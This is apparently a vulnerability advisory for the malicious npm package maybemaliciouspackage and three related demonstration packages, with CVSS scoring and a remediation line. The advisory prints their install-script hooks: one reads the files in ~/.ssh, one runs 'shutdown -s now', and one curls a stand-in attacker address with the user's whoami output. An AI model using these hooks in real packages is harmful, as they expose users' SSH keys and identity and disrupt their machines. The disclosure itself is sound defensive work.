Malicious Package

Affecting maybemaliciouspackage package, ALL versions

Do your applications use this vulnerable package? Test your applications

Overview

maybemaliciouspackage is a malicious package that is used to demonstrate or test malicious install scripts. These scripts can send your local ssh file to an attacker, or download malicious files and run them in the background.

This is especially dangerous in production runtime environments, where environment variables tend to consist of keys, passwords, tokens and other secrets.

On August 1st, 2017 npm deprecated all malicious typosquatting libraries from this list.

The list of packages and their scripts are:

{
  "name": "maybemaliciouspackage",
  "scripts": {
    "postinstall": "find ~/.ssh | xargs cat || true && echo '\n\n\n\n\n\nOH HEY LOOK SSH KEYS\n\n\n\n\n\n\n'"
  }
},
{
  "name": "deasyncp",
  "scripts": {
    "preinstall": "say U WOT M8; shutdown -s now"
  }
},
{
  "name": "harmlesspackage",
  "scripts": {
    "postinstall": "echo '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nThanks for your SSH         keys :)' && curl -X GET http://1.3.3.7:1337/\\?$(whoami)"
  }
},
{
  "name": "npm-exploit",
  "scripts": {
    "install": "mkdir -p ~/Desktop/sploit && touch ~/Desktop/sploit/haxx"
  }
}

Remediation

Avoid usage of this package altogether.

References

CVSS Score

8.8
high severity
  • Attack Vector
    Network
  • Attack Complexity
    Low
  • Privileges Required
    None
  • User Interaction
    Required
  • Scope
    Unchanged
  • Confidentiality
    High
  • Integrity
    High
  • Availability
    High
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Credit
Jordan Wright
CWE
CWE-506
Snyk ID
npm:maybemaliciouspackage:20170917
Disclosed
08 Aug, 2017
Published
17 Sep, 2017